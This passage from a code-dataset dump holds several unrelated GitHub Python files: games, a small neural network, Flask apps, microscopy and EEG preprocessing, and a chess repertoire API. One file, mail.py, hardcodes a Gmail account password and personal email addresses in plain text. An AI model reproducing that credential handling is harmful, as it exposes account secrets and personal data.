band_index in enumerate(self.ds.indexes):\n # data = self.ds.read(band_index)\n # # self.nodata_mask[i] = data == -1 # np.logical_or(self.nodata_mask,\n","repo_name":"InnopolisUni/innofw","sub_path":"innofw/utils/data_utils/preprocessing/raster_handler.py","file_name":"raster_handler.py","file_ext":"py","file_size_in_byte":4614,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"3416183026","text":"import json\r\nimport cv2\r\nimport os\r\n\r\n\r\ndef make_cropped_label(x, y, w, h, file_name, folder_path):\r\n im = cv2.imread('./input/image1.png')\r\n # y is starting y-axis and y+h is end of y-axis\r\n # x is staring x-axis and x+w is end of x-axis\r\n cropped = im[y:y + h, x:x + w]\r\n # if directory exist then do nothing if not then it will make\r\n os.makedirs(os.path.dirname(folder_path), exist_ok=True)\r\n cv2.imwrite(folder_path + str(y) + '$' + file_name, cropped)\r\n\r\n\r\ndef cropped_images():\r\n with open('input/json/test.json', 'r') as j:\r\n dicts = json.load(j)\r\n json_name = 
dicts[0]\r\n for box in json_name[\"regions\"]:\r\n box_dict = box['bounding_box']\r\n make_cropped_label(box_dict['x'], box_dict['y'], box_dict['w'], box_dict['h'], json_name.get(\"image_name\"),\r\n './output/croped/')\r\n\r\n\r\ncropped_images()\r\n","repo_name":"testBlueaves/upload-image","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70319828647","text":"\"\"\"empty message\n\nRevision ID: 2a21b5c62227\nRevises: 8018c490c23\nCreate Date: 2014-08-18 20:51:28.993000\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '2a21b5c62227'\ndown_revision = '8018c490c23'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('profile_image', sa.String(length=100), nullable=True))\n op.drop_column('user', 'profile_img')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('profile_img', mysql.VARCHAR(length=100), nullable=True))\n op.drop_column('user', 'profile_image')\n ### end Alembic commands ###\n","repo_name":"daye10003/SNS","sub_path":"migrations/versions/2a21b5c62227_.py","file_name":"2a21b5c62227_.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36809105857","text":"Challenge_ID = str\nCP_Score = int\nDepth = int\nDTM = int\nDTZ = int\nGame_ID = str\nHas_Reached_Rate_Limit = bool\nIs_Misconfigured = bool\nLearn = int\nOffer_Draw = bool\nOutcome = str\nPerformance = int\nResign = bool\nSuccess = bool\nUCI_Move = str\nUsername = str\nWeight = float\n","repo_name":"Justaposture/-i019211","sub_path":"aliases.py","file_name":"aliases.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40096993327","text":"from board import Board\nfrom knott import Knott\nfrom tic_tac_toe import Cross\n\n\n\nchoices = 'X0'\nplayer1_choice = input(\"Choose X or 0 \")\nplayer2_choice = choices.replace(player1_choice,'')\nprint(f\"Player1 chooses {player1_choice}\")\nprint(f\"Player2 gets {player2_choice}\")\n\nvalue = None\nbox_number = None\n\nobject1 = 2\nobject2 = 3\nobject3 = 4\nobject4 = 5\nobject5 = 6\nobject6 = 7\nobject7 = 8\nobject8 = 9\nobject9 = 10\n\ndef object_call (value , box_number):\n if box_number == 1:\n global object1\n object1 = value\n\n if box_number == 2:\n global object2\n object2 = value\n\n if box_number == 3:\n global object3\n object3 = value\n\n if box_number == 4:\n global object4\n object4 = value\n\n if box_number == 5:\n global object5\n object5 = value\n\n if box_number == 6:\n global object6\n object6 = value\n\n if box_number == 7:\n global object7\n object7 = value\n\n if box_number == 8:\n global object8\n object8 = value\n\n if box_number == 9:\n global object9\n object9 = value\n\n \n\ndef victory_check():\n \n if object1 == object2 == object3 or object7 == object8 == object9 or object4 == object5 == object6 or object1 == object4 == object7 or object2 == object5 == object8 or object3 == object6 == object9 or object1 == object5 == object9 or object3 == object5 == object7 :\n return 0\n else:\n return 1\n\ncount = 0\nwhile True :\n box_number = int(input(\"Player 1 enter 
\"))\n if player1_choice == 'X':\n object = Cross(box_number)\n value = object.value\n \n elif player1_choice == '0':\n object = Knott(box_number)\n value = object.value\n \n object_call(value,box_number)\n\n count = count+1 \n if count==9:\n print(\"no one wins\")\n break\n \n status_1 = victory_check()\n \n if status_1 == 1:\n pass\n\n elif status_1 == 0 :\n print(\"player1 wins\")\n break\n \n box_number = int(input(\"Player 2 enter \"))\n if player2_choice == 'X':\n object = Cross(box_number)\n value = object.value\n \n elif player2_choice == '0':\n object = Knott(box_number)\n value = object.value\n \n object_call(value,box_number)\n\n count = count+1\n if count==9:\n print(\"no one wins\")\n break\n \n status_2 = victory_check()\n \n if status_2 == 1:\n pass\n\n elif status_2 == 0:\n print(\"player2 wins\")\n break\n\n \n\n\n\n\n\n","repo_name":"Arunabh17/tic_tac_toe","sub_path":"tic tac toe/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23756943411","text":"import pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn import metrics\r\nfrom flask import Flask,request,render_template\r\nimport pickle\r\n\r\napp=Flask(__name__)\r\nq=\"\"\r\n@app.route(\"/\")\r\ndef loadPage():\r\n return render_template('home.html',query='')\r\n\r\n@app.route('/',methods=['POST'])\r\ndef cancerPredict():\r\n\r\n #5 input queries from the user post method allows us\r\n input1=request.form['query1']\r\n input2=request.form['query2']\r\n input3=request.form['query3']\r\n input4=request.form['query4']\r\n input5=request.form['query5']\r\n data=[[input1,input2,input3,input4,input5]]\r\n new_df=pd.DataFrame(data,columns=['texture_mean','perimeter_mean','smoothness_mean','compactness_mean','symmetry_mean'])\r\n\r\n model = pickle.load(open(\"model.sav\", \"rb\"))\r\n y_pred=model.predict(new_df)\r\n probability=model.predict_proba(new_df)[:,1]\r\n if y_pred==1:\r\n o1=\"The patient is diagnosed with Breast Cancer\"\r\n o2=\"Confidence {}\".format(probability*100)\r\n else:\r\n o1=\"The patient is healthy and not diagnosed with Breast Cancer\"\r\n o2=\"Confidence {} \".format(probability*100)\r\n return render_template('home.html',output1=o1,output2=o2,query1=request.form['query1'],query2=request.form['query2'],query3=request.form['query3'],query4=request.form['query4'],query5=request.form['query5'])\r\napp.run()","repo_name":"keithferns98/E2E_DEV","sub_path":"BreastCancerpredflask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72418076649","text":"# PREPROCESSING SCRIPT\n# Images are stored as multi-channel images. During image acquisition one additional image\n# is stored with the LED off. 
This image has to be removed.\n\n\nimport re\nfrom pathlib import Path\n\nimport numpy as np\nfrom skimage.io import imread, imsave\nfrom tqdm import tqdm\n\n\ndef NDTiffStack_to_tiff(\n\n path_parent = Path(r'/media/tom/Transcend/autofish_test_input/'),\n n_z = 33, # number of z plances\n n_pos = 3, # number of field of images\n # Number of channels\n n_c_default = 1,\n n_c_dict = {'r0_1': 2, 'r1_1': 2},\n # Diverse string replacements\n string_replacements_path = [('images_multi-stack', 'images'),\n ('_1', '')],\n\n string_replacements_file = [('_NDTiffStack.*', ''),\n (\"_bgd*\", \"\"),\n ('Pos', 'pos'),\n ],\n folder_save = \"/media/tom/Transcend/autofish_test/\"\n ):\n \"\"\"\n Args:\n path_parent: (Str) Path to main folder containing the round folder of NDTiffStack\n n_z: (int) number of z stack\n n_pos: (int) number of field of images\n n_c_default: (int) default number of channel\n n_c_dict: (dict) add round that have a different number of channel like additional DAPI staining e\n ex :{'r0_1': 2, 'r1_1': 2}\n string_replacements_path: (list of tuple) list of tuple of string to replace in the folder name\n string_replacements_file: (list of tuple) list of tuple of string to replace in the file name\n folder_save: (str) path to the folder to save the tiff\n Returns:\n list of exception if any\n \"\"\"\n n_c_keys = list(n_c_dict.keys())\n path_parent = Path(path_parent)\n folder_save = Path(folder_save)\n folder_save.mkdir(parents=True, exist_ok=True)\n path_list = []\n for child in path_parent.glob('**/'):\n # for child in path_parent.rglob('*'):\n path_list.append(child)\n path_list.remove(path_parent)\n print(path_list)\n # %% Loop over all subfolders\n list_exceptions = []\n for path_images in tqdm(path_list):\n try:\n print(f'>>>> SCANNING FOLDER FOR IMAGES: {path_images}')\n # Get number of channels\n n_c_key = [n_c_key for n_c_key in n_c_keys if (n_c_key in str(path_images))]\n if len(n_c_key) == 0:\n n_c = n_c_default\n print(f'Will use default number of channels: {n_c}')\n elif len(n_c_key) == 1:\n n_c = n_c_dict[n_c_key[0]]\n print(f'Will use pre-defined channel number {n_c} for round {n_c_key[0]}')\n else:\n raise Exception(f'ERROR: multiple matches for n_c found, verify strings: {n_c_key}')\n # >>> Scan folder to get all files\n file_list = []\n for f_image in path_images.glob('*.tif'):\n # >> Only NDTIFF\n if ('NDTiffStack' in str(f_image.stem)):\n file_list.append(str(f_image))\n else:\n print(' Image name suggests that this is not a NDTiff image, will skip this one.')\n continue\n file_list = sorted(file_list)\n n_files = len(file_list)\n print(f' Found images: {file_list}')\n # >> Create path to save images\n round_name = path_images.name\n for old, new in string_replacements_path:\n round_name = re.sub(old, new, round_name, count=0, flags=0)\n path_save = folder_save / round_name\n print(f' Images will be saved in folder: {path_save}')\n path_save.mkdir(parents=True, exist_ok=True)\n\n # >>>>> Loop over images and split channels\n\n i_total = 0 # Total number of processed slices\n i_file = 0 # Index of currently loaded file\n\n # load first image\n print(f' Loading image: {file_list[i_file]}')\n img = imread(file_list[i_file])\n print(f' Image shape: {img.shape} {path_images.name}')\n if img.shape[-1] == 3:\n img = img.transpose(2, 0, 1) # Transpose to (z, x, y)\n n_slices = img.shape[0]\n\n for i_pos in tqdm(range(0, n_pos)):\n for i_c in range(0, n_c):\n\n # Index of current image\n i_img = (i_pos) * n_c + i_c\n\n # Start and end index of current image\n i_start = 
(i_img * n_z)\n i_end = (i_start + n_z - 1)\n\n # Correct for all slices loaded from previous images\n i_start = i_start - i_total\n i_end = i_end - i_total\n\n print(f' start-end: {i_start}:{i_end}')\n\n # >> Decide if next image should be loaded\n if i_end <= n_slices:\n img_save = img[i_start:i_end, :, :]\n # Next image needs to be loaded\n elif (i_end > n_slices):\n\n # Extract remaining image\n img_tmp_1 = img[i_start:n_slices, :, :]\n\n # Load next image\n i_file = i_file + 1\n i_total = i_total + n_slices\n\n if i_file >= n_files:\n raise Exception(\n ' We are having an issue here, should open another file to continue, but there are not files left.')\n print(f' Loading image: {file_list[i_file]}')\n img = imread(file_list[i_file])\n print(f' Image shape: {img.shape}')\n if img.shape[-1] == 3:\n img = img.transpose(2, 0, 1)\n n_slices = img.shape[0]\n\n # Load remainder of image\n img_tmp_2 = img[0:i_end - i_total, :, :]\n\n # Add images\n img_save = np.concatenate((img_tmp_1, img_tmp_2), axis=0)\n\n # File name\n name_save = str(f_image.stem)\n for old, new in string_replacements_file:\n name_save = re.sub(old, new, name_save, count=0, flags=0)\n name_save = name_save + f'_pos{i_pos}' + f'_ch{i_c}' + '.tif'\n\n # Save image\n f_save = path_save / name_save\n print(f' Image will be saved as {str(f_save)}')\n print(f' SAVED Image shape: {img_save.shape}')\n imsave(str(f_save), img_save, check_contrast=False)\n except Exception as e:\n print(f'ERROR: {e}')\n list_exceptions.append((e, path_images.name))\n return list_exceptions\n","repo_name":"tdefa/autofish-img-analysis","sub_path":"autofish_analysis/split_ndtiff_stack.py","file_name":"split_ndtiff_stack.py","file_ext":"py","file_size_in_byte":6863,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42046162056","text":"import random\r\nimport numpy as np\r\n\r\ndados = {\r\n 'or': [[0.0, 0.0, 0.0],\r\n [0.0, 1.0, 1.0],\r\n [1.0, 0.0, 1.0],\r\n [1.0, 1.0, 1.0]],\r\n \r\n 'and': [[0.0, 0.0, 0.0],\r\n [0.0, 1.0, 0.0],\r\n [1.0, 0.0, 0.0],\r\n [1.0, 1.0, 1.0]],\r\n \r\n 'xor': [[0.0, 0.0, 0.0],\r\n [0.0, 1.0, 1.0],\r\n [1.0, 0.0, 1.0],\r\n [1.0, 1.0, 0.0]],\r\n\r\n 'nand' : [[0.0, 0.0, 1.0],\r\n [0.0, 1.0, 1.0],\r\n [1.0, 0.0, 1.0],\r\n [1.0, 1.0, 0.0]]\r\n}\r\n\r\nneuronios = { \r\n 'A': {\r\n 'erro': float(0.00),\r\n 'saida': float(0.00),\r\n 'ativacao': float(0.00)\r\n }, \r\n \r\n 'B': {\r\n 'erro': float(0.00),\r\n 'saida': float(0.00),\r\n 'ativacao': float(0.00)\r\n },\r\n \r\n 'C': {\r\n 'erro': float(0.00),\r\n 'saida': float(0.00),\r\n 'ativacao': float(0.00)\r\n }\r\n}\r\n\r\nbias = [1.0, 1.0, 1.0] #a, b, c\r\n\r\n\r\npesos_A = list([random.uniform(-1.2,1.2), random.uniform(-1.2, 1.2)])\r\npesos_B = list([random.uniform(-1.2,1.2), random.uniform(-1.2, 1.2)])\r\npesos_C = list([random.uniform(-1.2,1.2), random.uniform(-1.2, 1.2)]) # 0=A, 1=B\r\n\r\ndef sigmoid(x):\r\n return 1 / (1 + np.exp(-x))\r\n\r\ndef treinamento(entrada, max_iter, tx_aprend):\r\n sair = 0\r\n erroGlobal = 0\r\n it = 0\r\n j = 0\r\n global neuronios\r\n global bias\r\n global pesos_A\r\n global pesos_B\r\n global pesos_C\r\n\r\n while it <= max_iter and sair == 0:\r\n quadErro = 0\r\n\r\n for i in range(len(entrada)):\r\n \r\n # cálculo da ativação e saída da primeira camada\r\n neuronios['A']['ativacao'] = pesos_A[0]*entrada[i][0] + pesos_A[1]*entrada[i][1] + bias[0]\r\n neuronios['B']['ativacao'] = pesos_B[0]*entrada[i][0] + pesos_B[1]*entrada[i][1] + bias[1]\r\n\r\n neuronios['A']['saida'] = 
sigmoid(neuronios['A']['ativacao'])\r\n neuronios['B']['saida'] = sigmoid(neuronios['B']['ativacao'])\r\n\r\n\r\n # cálculo da ativação e saída da última camada\r\n neuronios['C']['ativacao'] = pesos_C[0]*neuronios['A']['saida'] + pesos_C[1]*neuronios['B']['saida'] + bias[2]\r\n neuronios['C']['saida'] = sigmoid(neuronios['C']['ativacao'])\r\n\r\n\r\n # cálculo do erro na saída da rede\r\n erroGlobal = entrada[i][2] - neuronios['C']['saida']\r\n\r\n #quadErro = quadErro + (erroGlobal**2)\r\n\r\n # cálculo do erro local da última camada\r\n neuronios['C']['erro'] = erroGlobal * neuronios['C']['saida'] * (1- neuronios['C']['saida'])\r\n\r\n # cálculo do erro local da primeira camada\r\n neuronios['A']['erro'] = neuronios['A']['saida']*(1- neuronios['A']['saida']) * pesos_C[0]*neuronios['C']['erro']\r\n neuronios['B']['erro'] = neuronios['B']['saida']*(1- neuronios['B']['saida']) * pesos_C[1]*neuronios['C']['erro']\r\n\r\n \r\n # Ajuste dos pesos nas unidades intermediárias (Neurônio A)\r\n bias[0] = bias[0] + (tx_aprend * neuronios['A']['erro'] * bias[0])\r\n pesos_A[0] = pesos_A[0] + (tx_aprend * neuronios['A']['erro'] * entrada[i][0])\r\n pesos_A[1] = pesos_A[1] + (tx_aprend * neuronios['A']['erro'] * entrada[i][1])\r\n\r\n # Ajuste dos pesos nas unidades intermediárias (Neurônio B)\r\n bias[1] = bias[1] + (tx_aprend * neuronios['B']['erro'] * bias[1])\r\n pesos_B[0] = pesos_B[0] + (tx_aprend * neuronios['B']['erro'] * entrada[i][0])\r\n pesos_B[1] = pesos_B[1] + (tx_aprend * neuronios['B']['erro'] * entrada[i][1])\r\n\r\n # ajuste dos pesos e bias da última camada \r\n bias[2] = bias[2] + (tx_aprend * neuronios['C']['erro'] * bias[2])\r\n pesos_C[0] = pesos_C[0] + (tx_aprend * neuronios['C']['erro'] * neuronios['A']['saida'])\r\n pesos_C[1] = pesos_C[1] + (tx_aprend * neuronios['C']['erro'] * neuronios['B']['saida'])\r\n\r\n j+=1 \r\n if j >4:\r\n j = 0 \r\n quadErro = quadErro + (erroGlobal * erroGlobal)\r\n if quadErro <= 0.001:\r\n sair = 1\r\n print(\"treinamento ok!\")\r\n else:\r\n sair = 0\r\n quadErro = 0\r\n else:\r\n quadErro = quadErro + (erroGlobal * erroGlobal)\r\n \r\n print(\"quad erro - \", quadErro)\r\n it = it+1\r\n\r\n\r\ndef use():\r\n op = 'S'\r\n\r\n while op == 'S':\r\n entrada_user1 = int(input(\"Insira um valor para entrada (0 ou 1)- \"))\r\n entrada_user2 = int(input(\"Insira outro valor para entrada (0 ou 1)- \"))\r\n\r\n neuronios['A']['ativacao'] = bias[0] + pesos_A[0] * entrada_user1 + pesos_A[1] * entrada_user2\r\n neuronios['B']['ativacao'] = bias[1] + pesos_B[0] * entrada_user1 + pesos_B[1] * entrada_user2\r\n\r\n neuronios['A']['saida'] = sigmoid(neuronios['A']['ativacao'])\r\n neuronios['B']['saida'] = sigmoid(neuronios['B']['ativacao'])\r\n\r\n neuronios['C']['ativacao'] = bias[2] + pesos_C[0] * neuronios['A']['saida'] + pesos_C[1] * neuronios['B']['saida']\r\n neuronios['C']['saida'] = sigmoid(neuronios['C']['ativacao'])\r\n\r\n saida_use = neuronios['C']['saida']\r\n\r\n if saida_use < 0.5:\r\n saida_use = 0\r\n else:\r\n saida_use = 1\r\n\r\n print(\"Entrada 1 - \", entrada_user1)\r\n print(\"Entrada 2 - \", entrada_user2)\r\n print(\"Saída - \", saida_use)\r\n \r\n op = str(input('Deseja Continuar, S ou N - ')).upper() \r\n\r\n \r\n\r\nchave = str(input(\"Insira uma tabela para treino: XOR, OR, AND, NAND - \")).lower()\r\nn_iter = int(input(\"Insira o número máxmo de iterações - \"))\r\ntx_aprend = float(input(\"Insira a taxa de aprendizado para a rede - \"))\r\nent = dados[chave]\r\n\r\ntreinamento(ent, n_iter, 
tx_aprend)\r\nuse()\r\n","repo_name":"YuriBandeira28/Inteligencia-Artificial","sub_path":"MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":6455,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12619668217","text":"import logging\nfrom dff.script import TRANSITIONS, RESPONSE, MISC, Message\nfrom dff.pipeline import Pipeline\nimport dff.script.conditions as cnd\n\nfrom .utils import condition as loc_cnd\nfrom .utils.common import pre_services\nfrom dff.utils.testing import run_interactive_mode\n\nlogger = logging.getLogger(__name__)\n\n# Below, `script` is the dialog script.\n# A dialog script is a flow dictionary that can contain multiple flows .\n# script are needed in order to divide a dialog into sub-dialogs and process them separately.\n# For example, the separation can be tied to the topic of the dialog.\n# In our example, there is one flow called greeting_flow.\n\n# Inside each flow, we can describe a sub-dialog.\n# Here we can also use keyword `LOCAL`, which we have considered in other examples.\n\n# Flow describes a sub-dialog using linked nodes, each node has the keywords `RESPONSE` and `TRANSITIONS`.\n\n# `RESPONSE` - contains the response that the dialog agent will return when transitioning to this node.\n# `TRANSITIONS` - describes transitions from the current node to other nodes.\n# `TRANSITIONS` are described in pairs:\n# - the node to which the agent will perform the transition\n# - the condition under which to make the transition\nscript = {\n \"greeting_flow\": {\n \"start_node\": { # This is an initial node, it doesn't need an `RESPONSE`\n RESPONSE: Message(text=\"\"),\n # TRANSITIONS: {\"node1\": cnd.exact_match(Message(text=\"Hi\"))}, # If \"Hi\" == request of user then we make the transition\n TRANSITIONS: {\n \"node1\": cnd.all([loc_cnd.is_sf(\"Open.Give.Opinion\"), loc_cnd.is_midas(\"pos_answer\")])\n },\n MISC: {\"speech_functions\": [\"start_node\"]},\n },\n \"node1\": {\n RESPONSE: Message(text=\"Hi, how are you?\"), # When the agent goes to node1, we return \"Hi, how are you?\"\n TRANSITIONS: {\"node2\": cnd.exact_match(Message(text=\"i'm fine, how are you?\"))},\n },\n \"node2\": {\n RESPONSE: Message(text=\"Good. 
What do you want to talk about?\"),\n TRANSITIONS: {\"node3\": cnd.exact_match(Message(text=\"Let's talk about music.\"))},\n MISC: {\"speech_functions\": [\"Open.Attend\"]},\n },\n \"node3\": {\n RESPONSE: Message(text=\"Sorry, I can not talk about music now.\"),\n TRANSITIONS: {\"node4\": cnd.exact_match(Message(text=\"Ok, goodbye.\"))},\n },\n \"node4\": {\n RESPONSE: Message(text=\"bye\"),\n TRANSITIONS: {\"node1\": cnd.exact_match(Message(text=\"Hi\"))},\n MISC: {\"speech_functions\": [\"Open.Attend\"]},\n },\n \"fallback_node\": { # We get to this node if an error occurred while the agent was running\n RESPONSE: Message(text=\"Ooops\"),\n TRANSITIONS: {\"node1\": cnd.exact_match(Message(text=\"Hi\"))},\n MISC: {\"speech_functions\": [\"fallback_node\"]},\n },\n },\n}\n\n# A pipeline is an object that processes user input replicas and returns responses\n# To create the pipeline, you need to pass the script of the dialogue `script`\n# And pass the initial node `start_label`\n# and the node to which the pipeline will go in case of an error `fallback_label`\n# If `fallback_label` is not set, then its value becomes equal to `start_label` by default\npipeline = Pipeline.from_script(\n script=script,\n start_label=(\"greeting_flow\", \"start_node\"),\n fallback_label=(\"greeting_flow\", \"fallback_node\"),\n pre_services=pre_services\n)\n\nif __name__ == \"__main__\":\n run_interactive_mode(pipeline)\n","repo_name":"ruthenian8/dialog_flow_sdk","sub_path":"examples/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15928007868","text":"import mne\nfrom os import path\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n'''\nFiltered raw fif data files are contain data from 1 block (PV0, WM0, PV1, WM1)\nThey have the following format ...\n %4d_%s%d_%s:%sHz-raw.fif % (participant_number, condition, block_number,\n l_freq, h_freq)\n'''\n\n# define the code directory\ncode_dir = path.dirname(__file__)\n\n# define the data directory (this file is not found in the repository, there\n# should be a local copy on your machine that points to the data)\nfid = open(code_dir + '/data_dir.path')\ndata_dir = fid.read().rstrip('\\n')\nfid.close()\n\n\nclass raw_filt:\n\n \"\"\"Class to handle filtered raw eeg data\n\n Parameters\n ----------\n participant_id : int\n The id number for this participant\n condition : str\n Passive view (PV) or Working memory (WM)\n block_number : int\n 0 or 1\n l_freq : int\n The high pass\n h_freq : int\n The low pass\n \"\"\"\n def __init__(self, participant_id, condition, block_number,\n l_freq, h_freq):\n\n self.participant_id = participant_id\n self.condition = condition\n self.block_number = block_number\n self.raw_fname = data_dir + '/FILTFIF/%d_%s%d_%s:%sHz-raw.fif' % \\\n (participant_id, condition, block_number,\n l_freq, h_freq)\n\n def _read_fif(self):\n # check to see if data has already been read\n if hasattr(self, 'raw'):\n return self.raw\n else:\n # read the raw fif\n raw = mne.io.read_raw_fif(self.raw_fname, preload=True, proj=False,\n add_eeg_ref=False)\n # store is attribute\n self.raw = raw\n return raw\n\n def plot_event_channel(self, show=False, save=True,\n figsize=(20, 10)):\n # read the raw fif\n raw = mne.io.read_raw_fif(self.raw_fname, preload=False, proj=False,\n add_eeg_ref=False)\n # find the events\n x1, t1 = raw[-1]\n x1 = x1[0]\n # plot the events\n fig = plt.figure(figsize=figsize)\n ax = 
fig.add_subplot(111)\n ax.plot(t1, x1, 'b')\n ax.set_xticks(np.arange(0, t1.max(), 100))\n ax.set_ylim((0, 6e4))\n ax.set_xlabel('Time (seconds)')\n xlim = ax.get_xlim()\n ax.plot(xlim, [4096, 4096], 'r-')\n ax.plot(xlim, [8192, 8192], 'r-')\n ax.plot(xlim, [16384, 16384], 'r-')\n ax.plot(xlim, [32768, 32768], 'r-')\n\n if save:\n # save the figure\n png_fname = self.raw_fname.replace('.fif', '.png')\n fig.savefig(png_fname)\n if show:\n # display the figure\n plt.show()\n else:\n # close the figure\n plt.close(fig)\n\n def epoch_data(self):\n # read the raw data\n raw = self._read_fif()\n # get the events\n eve = mne.find_events(raw, mask=255)\n # epoch the data\n epo = mne.Epochs(raw, eve, [16384, 32768], -0.1, 0.5,\n preload=True, proj=False, add_eeg_ref=False)\n # generate the epoch filename\n epo_fname = data_dir + '/EPODATA/%d_%s%d-epo.fif' % \\\n (self.participant_id, self.condition,\n self.block_number)\n # save the epoch data\n epo.save(epo_fname)\n # store the epoch data filename\n self.epo_fname = epo_fname\n\nif __name__ == \"__main__\":\n # make sure that the path exists\n this_eeg = raw_filt(1038, 'PV', 0, 1, 30)\n assert path.exists(this_eeg.raw_fname)\n","repo_name":"snn88/EmoWorM_Analysis","sub_path":"raw_filt.py","file_name":"raw_filt.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"906837984","text":"import smtplib\nfrom email.message import EmailMessage\n\ndef send_mail(qty,stri):\n if(stri==\"received\"):\n msg = EmailMessage()\n my_msg = \"Dear Customer, This is a confirmation that your order of quantity \" + str(qty) + \" has been successfully delivered. Looking forward to collaborate with you again in future.\"\n msg.set_content(my_msg)\n msg['Subject'] = 'Order delivered Successfully'\n elif(stri==\"ordered\"):\n msg = EmailMessage()\n my_msg = \"Dear Customer, This is a confirmation that your order of quantity \" + str(qty) + \" has been successfully placed. 
Looking forward to collaborate with you again in future.\"\n msg.set_content(my_msg)\n msg['Subject'] = 'Order placed Successfully'\n\n msg['From'] = \"pran19cs@cmrit.ac.in\"\n msg['To'] = \"nm.prashanth.64@gmail.com,dishasaligrama1@gmail.com\"\n # Send the message via our own SMTP server.\n server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n server.login(\"pran19cs@cmrit.ac.in\", \"qwerty@123\")\n server.send_message(msg)\n server.quit()\n\n \n\n","repo_name":"PrashanthNM/Inventory-project-updated","sub_path":"src/inventoryproject/main/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39209051229","text":"import os\nfrom os.path import expanduser\n\nhDirectory = home = expanduser(\"~\")\n\nos.chdir(hDirectory)\nfor f in os.listdir('.'):\n if not f.startswith('.'):\n print(f)\ndirLoc = input('choose a directory: ')\nos.chdir(dirLoc)\n\nwhile True:\n mainName = input('Please Enter the folder name(enter \\'n\\' to exit): ')\n if mainName == 'n':\n break\n os.mkdir(mainName)\n os.chdir(mainName)\n while True:\n subName = input('Please enter the name for subdirectory(enter \\'n\\' to exit): ')\n if subName == 'n':\n os.chdir('..')\n break\n os.mkdir(subName)\n\n","repo_name":"Mustafa-CodeHub/pythonCmd","sub_path":"createFolder/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71269359209","text":"import chess\nfrom flask import Blueprint, jsonify, request\n\nfrom opening_generator.api.api_position import (\n get_board_by_fen,\n get_position_by_board,\n get_color,\n)\nfrom opening_generator.exceptions import InvalidRequestException\nfrom opening_generator.models import Position, User\nfrom opening_generator.services.position_service import position_service\nfrom opening_generator.services.repertoire_service import repertoire_service\nfrom opening_generator.services.user_service import user_service\n\nrepertoire_bp = Blueprint(\"repertoire\", __name__, url_prefix=\"/api/repertoire\")\n\n\ndef get_request_arguments(args):\n move: str = args.get(\"move\")\n color: bool = get_color(args=args)\n board: chess.Board = get_board_by_fen(args)\n position: Position = get_position_by_board(board)\n\n return dict(move=move, color=color, position=position, depth=board.fullmove_number)\n\n\n@repertoire_bp.route(\"\", methods=[\"GET\"])\ndef get_user_repertoire():\n user: User = user_service.get_user()\n args = get_request_arguments(request.args)\n\n moves = repertoire_service.get_repertoire_moves(\n args[\"position\"], user, args[\"color\"], args[\"depth\"]\n )\n return (\n jsonify(message=f\"Repertoire retrieved correctly.\", data=moves, success=True),\n 200,\n )\n\n\n@repertoire_bp.route(\"/info\", methods=[\"GET\"])\ndef get_user_repertoire_info():\n user: User = user_service.get_user()\n\n info = repertoire_service.get_user_repertoire_info(user=user)\n\n return (\n jsonify(\n message=f\"Repertoire info retrieved correctly.\", data=info, success=True\n ),\n 200,\n )\n\n\n@repertoire_bp.route(\"\", methods=[\"POST\"])\ndef create_user_repertoire():\n body = request.json\n\n if not body:\n raise InvalidRequestException(description=\"Missing request body\")\n\n color = body.get(\"color\")\n if not color or color.upper() not in (\"WHITE\", \"BLACK\"):\n raise InvalidRequestException(description=\"Invalid color provided\")\n\n user: User = 
user_service.get_user()\n initial_position = position_service.retrieve_initial_position()\n repertoire_service.create_user_repertoire(\n position=initial_position, user=user, color=color.upper() == \"WHITE\"\n )\n return jsonify(message=f\"Repertoire created correctly.\", data={}, success=True), 201\n\n\n@repertoire_bp.route(\"\", methods=[\"PUT\"])\ndef edit_user_repertoire():\n user: User = user_service.get_user()\n args = get_request_arguments(request.args)\n\n moves = repertoire_service.update_user_repertoire(\n args[\"position\"], user, args[\"color\"], args[\"move\"]\n )\n if len(moves) == 0:\n return (\n jsonify(\n message=f\"Repertoire could not be updated. Try with another move.\",\n data={},\n success=False,\n ),\n 400,\n )\n moves = repertoire_service.get_repertoire_moves(\n args[\"position\"], user, args[\"color\"], args[\"depth\"]\n )\n return (\n jsonify(\n message=f\"Repertoire updated correctly after {args['position'].fen}.\",\n data=moves,\n success=True,\n ),\n 200,\n )\n\n\n@repertoire_bp.route(\"\", 